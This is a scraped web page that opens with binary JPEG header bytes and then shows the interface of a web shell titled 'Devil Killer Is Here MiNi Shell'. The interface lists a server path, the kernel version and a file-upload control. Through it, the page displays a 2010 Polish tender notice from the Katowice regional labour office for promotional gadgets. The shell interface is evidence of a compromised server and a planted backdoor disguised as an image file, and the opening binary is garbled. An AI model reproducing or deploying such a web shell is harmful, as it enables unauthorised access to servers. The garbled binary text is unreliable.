JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100727/200709-N-2010.html

<p class="kh_header"><b>Katowice: Dostawa gadżetów wraz z nadrukiem promujących realizowany przez Wojewódzki Urząd Pracy w Katowicach projekt Rozmawiajmy! - dialog społeczny, jako skuteczna forma rozwiązywania problemów rynku pracy- postępowanie w dwóch częściach.</b><br>
<b>Numer ogłoszenia: 200709 - 2010; data zamieszczenia: 27.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu województwa nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gadżetów wraz z nadrukiem promujących realizowany przez Wojewódzki Urząd Pracy w Katowicach projekt Rozmawiajmy! - dialog społeczny, jako skuteczna forma rozwiązywania problemów rynku pracy- postępowanie w dwóch częściach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa gadżetów wraz z nadrukiem promujących projekt realizowany przez Wojewódzki Urząd Pracy w Katowicach Rozmawiajmy!- dialog społeczny, jako skuteczna forma rozwiązywania problemów rynku pracy.
Część I :

1.	Teczka na materiały konferencyjne - szt. 300
Teczka na materiały konferencyjne - rozmiar: min. 318 x 220mm(+/- 5%), grzbiet 5 - 7mm (+/- 5%), podwójne felcowanie, kolorystyka 4+0 CMYK, folia matowa od strony zewnętrznej, mieszcząca minimum 40 kartek formatu A4 o gramaturze 100g/m2, wykonana z kartonu o grubości minimalnej 250g/m2, skrzydełka o wym. 60mm - prawe, 60mm - dolne, skrzydełko dolne posiadające nacięcie na wizytówkę o wymiarach 90mm x 50mm. Nadruk ma zawierać kolorowe loga: Kapitał Ludzki, Flaga Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny, logo województwa-Śląskie. Pozytywna Energia- oraz informację, iż projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w tym dane teleadresowe i strona internetowa projektu. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane po 50 szt. 
2.	Notatnik - format A4 - szt. 300
Notatnik - format A-4, okładka kreda mat 200g/m2, środek offset 70g/m2, kolorystyka nadruk: okładka pełny kolor + folia mat + lakier wybiórczy na logotypach  (projekt graficzny okładki sporządzony przez Wykonawcę i przedstawiony do zatwierdzenia Zamawiającemu), środek kolorystyka 4+0 CMYK, objętość minimum 50 kartek, klejone na krótszym boku, wzmocnione tekturką z tyłu. Notatnik zawierać ma kolorowe loga (flaga Unii Europejskiej z podpisem -Unia Europejska Europejski Fundusz Społeczny- oraz logo Programu Operacyjnego Kapitał Ludzki, -Śląskie. Pozytywna energia-, dane teleadresowe, strona internetowa projektu, informacja o współfinansowaniu ze środków EFS w ramach PO KL oraz hasło PO KL -Człowiek-najlepsza inwestycja-. Projekt graficzny sporządzony przez Wykonawcę (pokrewny z projektem teczki na materiały konferencyjne) należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane po 10 szt. 
3.	Długopis -  szt. 300 
Długopis - aluminiowy z niebieskim wkładem, w kolorze srebrno-niebieskim (korpus niebieski, przycisk, uchwyt oraz końcówka srebrne) oraz srebrno-szarym (korpus szary, przycisk, uchwyt oraz końcówka srebrne). Wersje kolorystyczne w równych częściach. Wymiary nie mniejsze niż 13,5 x o 1,2 cm. W okolicach końcówki korpusu długopisu zamieszczony wzór pięciu srebrnych pierścieni, nadruk w technice laserowej, kolorystyka nadruku 1+0, nadruk obejmujący logo Programu Operacyjnego Kapitał Ludzki na jednej części korpusu a po drugiej stronie logo flaga Unii Europejskiej 
z podpisem -Unia Europejska Europejski Fundusz Społeczny-. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane po 50 szt. 
4.	Brelok z logo projektu - szt. 300
Brelok z logo projektu - metalowy, chromowano-matowy, prostokątny z obrotowym środkiem, zintegrowane metalowe kółeczko do kluczy o średnicy 30 - 40mm 
o spłaszczonych bokach; Wymiary: 45 x 25mm( +/- 15%). Na breloku laserowy grawer - logo Programu Operacyjnego Kapitał Ludzki, oraz na drugiej stronie logo flagi Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny (kolorystyka 1+0). Pakowany pojedynczo w kartonowe pudełko bez logo z plastikowym wkładem (wydmuszką) powleczonym aksamitem koloru czarnego. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu.
5.	Smycz na szyję - szt. 300
Smycz na szyję z karabinkiem - szerokość minimum 15 maksimum 20mm, długość całkowita (po złożeniu) maksimum 530 mm, taśma w kolorze pomarańczowym, nadruk sublimacyjny dwustronny w pełnym kolorze (do akceptacji przez Zamawiającego),zawierający logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny, -Śląskie. Pozytywna energia-oraz stronę internetową projektu,; z metalowym karabińczykiem, ze złączką plastikową w kolorze czarnym oraz pętelką na telefon. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu.
6.	Teczka - szt. 300
Teczka - Teczka wykonana z ekoskóry, na dokumenty o formacie min. A4, rozmiar:  35 x 26,2 x 4,8 cm (+/- 10%),   w kolorze czarnym lub brązowym, wyposażona wewnątrz 
w jedną obszerną kieszeń oraz trzy kieszenie płaskie w tym: jedną zapinaną na suwak, cztery kieszonki na wizytówki, uchwyt na pióro i długopis, metalowy klip i ring. Całość zamykana na suwak. Teczka opatrzona logotypami Logo Programu Operacyjnego Kapitał Ludzki, logo województwa -Śląskie. Pozytywna energia-, flaga Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny oraz adres strony internetowej projektu- tłoczone na sucho. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane pojedynczo w folię. 
Uwagi ogólne:

-  Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu. 
- Skład DTP materiałów drukowanych wraz z projektami jest uwzględniony 
w cenie usługi, a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego. Zamawiający zaakceptuje projekt w ciągu 3 dni roboczych od dnia przekazania.
- Wykonawca dostarczy (dostawa jednorazowa) gadżety wraz z nadrukiem do siedziby Zamawiającego w terminie 21 dni od dnia zawarcia umowy.
- Wykonawca przekazuje Zamawiającemu prawa do dysponowania użytymi 
w materiałach poligraficznych ich formami graficznymi (tzw. layoutami), przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie .cdr.

Część II :
1.	Pendrive - szt. 300   
Pendrive USB 4 GB - obudowa aluminiowa w kolorze pomarańczowym, zamykana, wraz z dopinaną smyczą (jednokolorową). Gwarancja 24 miesiące, pojemność: 4 GB, obsługiwany typ złącz - USB 2.0, kompatybilne z Windows 9x, Millenium, XP, Media Center oraz Vista, zgodny z USB 2.0 Hi-Speed, kompatybliny z USB 1.1, Plug and Play. Rozmiar od 58 mm do 90 mm(+/- 5%), szerokość maksimum 25 mm, grubość od 7 mm do 12 mm(+/- 5%). Waga 9g(+/- 5%). Rozmiar graweru 40mm x 15mm(+/- 5%). Nadruk w technice graweru laserowego - po jednej stronie logo Programu Operacyjnego Kapitał Ludzki, na drugiej stronie korpusu logo Unii Europejskiej z podpisem -Unia Europejska Europejski Fundusz Społeczny-. Każdy pendrive zapakowany w osobnym kartonowym pudełku koloru czarnego opatrzonym logotypami: Programu Operacyjnego Kapitał Ludzki i flagi Unii Europejskiej z podpisem -Unia Europejska Europejski Fundusz Społeczny-, -Śląskie. Pozytywna energia- oraz adres strony projektu (wykonane w technice trwałej). Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu.
Uwagi ogólne:

-  Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu. 
- Wykonawca dostarczy (dostawa jednorazowa) gadżety wraz z nadrukiem do siedziby Zamawiającego w terminie 21 dni od dnia zawarcia umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizowali co najmniej 5 usług odpowiadających swoim rodzajem i zakresem przedmiotowi zamówienia

		  Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia w/w warunku według formuły spełnia/nie spełnia na podstawie załączonego do oferty wykazu, przy czym wykaz ten zawierać będzie zamówienia  wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem dat wykonania i odbiorców wraz z załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie (np. referencje).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2. W przypadku złożenia kopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy 
w Katowicach,  
ul. Kościuszki 30 , pok. 305, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2010 godzina 10:00, miejsce: Wojewódzki Urząd Pracy 
w Katowicach,  
ul. Kościuszki 30 
kancelaria pok.352.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa gadżetów wraz z nadrukiem promujących projekt realizowany przez  Wojewódzki Urząd Pracy w Katowicach  Rozmawiajmy! - dialog społeczny, jako skuteczna forma rozwiązywania problemów rynku pracy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa gadżetów wraz z nadrukiem promujących projekt realizowany przez Wojewódzki Urząd Pracy w Katowicach Rozmawiajmy!- dialog społeczny, jako skuteczna forma rozwiązywania problemów rynku pracy.
Część I :

1.	Teczka na materiały konferencyjne - szt. 300
Teczka na materiały konferencyjne - rozmiar: min. 318 x 220mm(+/- 5%), grzbiet 5 - 7mm (+/- 5%), podwójne felcowanie, kolorystyka 4+0 CMYK, folia matowa od strony zewnętrznej, mieszcząca minimum 40 kartek formatu A4 o gramaturze 100g/m2, wykonana z kartonu o grubości minimalnej 250g/m2, skrzydełka o wym. 60mm - prawe, 60mm - dolne, skrzydełko dolne posiadające nacięcie na wizytówkę o wymiarach 90mm x 50mm. Nadruk ma zawierać kolorowe loga: Kapitał Ludzki, Flaga Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny, logo województwa-Śląskie. Pozytywna Energia- oraz informację, iż projekt współfinansowany jest przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w tym dane teleadresowe i strona internetowa projektu. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane po 50 szt. 
2.	Notatnik - format A4 - szt. 300
Notatnik - format A-4, okładka kreda mat 200g/m2, środek offset 70g/m2, kolorystyka nadruk: okładka pełny kolor + folia mat + lakier wybiórczy na logotypach  (projekt graficzny okładki sporządzony przez Wykonawcę i przedstawiony do zatwierdzenia Zamawiającemu), środek kolorystyka 4+0 CMYK, objętość minimum 50 kartek, klejone na krótszym boku, wzmocnione tekturką z tyłu. Notatnik zawierać ma kolorowe loga (flaga Unii Europejskiej z podpisem -Unia Europejska Europejski Fundusz Społeczny- oraz logo Programu Operacyjnego Kapitał Ludzki, -Śląskie. Pozytywna energia-, dane teleadresowe, strona internetowa projektu, informacja o współfinansowaniu ze środków EFS w ramach PO KL oraz hasło PO KL -Człowiek-najlepsza inwestycja-. Projekt graficzny sporządzony przez Wykonawcę (pokrewny z projektem teczki na materiały konferencyjne) należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane po 10 szt. 
3.	Długopis -  szt. 300 
Długopis - aluminiowy z niebieskim wkładem, w kolorze srebrno-niebieskim (korpus niebieski, przycisk, uchwyt oraz końcówka srebrne) oraz srebrno-szarym (korpus szary, przycisk, uchwyt oraz końcówka srebrne). Wersje kolorystyczne w równych częściach. Wymiary nie mniejsze niż 13,5 x o 1,2 cm. W okolicach końcówki korpusu długopisu zamieszczony wzór pięciu srebrnych pierścieni, nadruk w technice laserowej, kolorystyka nadruku 1+0, nadruk obejmujący logo Programu Operacyjnego Kapitał Ludzki na jednej części korpusu a po drugiej stronie logo flaga Unii Europejskiej 
z podpisem -Unia Europejska Europejski Fundusz Społeczny-. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane po 50 szt. 
4.	Brelok z logo projektu - szt. 300
Brelok z logo projektu - metalowy, chromowano-matowy, prostokątny z obrotowym środkiem, zintegrowane metalowe kółeczko do kluczy o średnicy 30 - 40mm 
o spłaszczonych bokach; Wymiary: 45 x 25mm( +/- 15%). Na breloku laserowy grawer - logo Programu Operacyjnego Kapitał Ludzki, oraz na drugiej stronie logo flagi Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny (kolorystyka 1+0). Pakowany pojedynczo w kartonowe pudełko bez logo z plastikowym wkładem (wydmuszką) powleczonym aksamitem koloru czarnego. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu.
5.	Smycz na szyję - szt. 300
Smycz na szyję z karabinkiem - szerokość minimum 15 maksimum 20mm, długość całkowita (po złożeniu) maksimum 530 mm, taśma w kolorze pomarańczowym, nadruk sublimacyjny dwustronny w pełnym kolorze (do akceptacji przez Zamawiającego),zawierający logo Programu Operacyjnego Kapitał Ludzki i flagę Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny, -Śląskie. Pozytywna energia-oraz stronę internetową projektu,; z metalowym karabińczykiem, ze złączką plastikową w kolorze czarnym oraz pętelką na telefon. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu.
6.	Teczka - szt. 300
Teczka - Teczka wykonana z ekoskóry, na dokumenty o formacie min. A4, rozmiar:  35 x 26,2 x 4,8 cm (+/- 10%),   w kolorze czarnym lub brązowym, wyposażona wewnątrz w jedną obszerną kieszeń oraz trzy kieszenie płaskie w tym: jedną zapinaną na suwak, cztery kieszonki na wizytówki, uchwyt na pióro i długopis, metalowy klip i ring. Całość zamykana na suwak. Teczka opatrzona logotypami Logo Programu Operacyjnego Kapitał Ludzki, logo województwa -Śląskie. Pozytywna energia-, flaga Unii Europejskiej z podpisem Unia Europejska, Europejski Fundusz Społeczny oraz adres strony internetowej projektu- tłoczone na sucho. Projekt graficzny sporządzony przez Wykonawcę należy przedstawić do zatwierdzenia Zamawiającemu. Pakowane pojedynczo w folię. 
Uwagi ogólne:

-  Logotypy oraz treść informacji umieszczonych na projektach graficznych Zamawiający przekaże w wersji elektronicznej Wykonawcy wyłonionemu w postępowaniu. 
- Skład DTP materiałów drukowanych wraz z projektami jest uwzględniony 
w cenie usługi, a przed drukiem musi być dostarczony do akceptacji przez Zamawiającego. Zamawiający zaakceptuje projekt w ciągu 3 dni roboczych od dnia przekazania.
- Wykonawca dostarczy (dostawa jednorazowa) gadżety wraz z nadrukiem do siedziby Zamawiającego w terminie 21 dni od dnia zawarcia umowy.
- Wykonawca przekazuje Zamawiającemu prawa do dysponowania użytymi 
w materiałach poligraficznych ich formami graficznymi (tzw. layoutami), przekaże również pliki w formie multimedialnej utworzonych layoutów w formacie .cdr..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
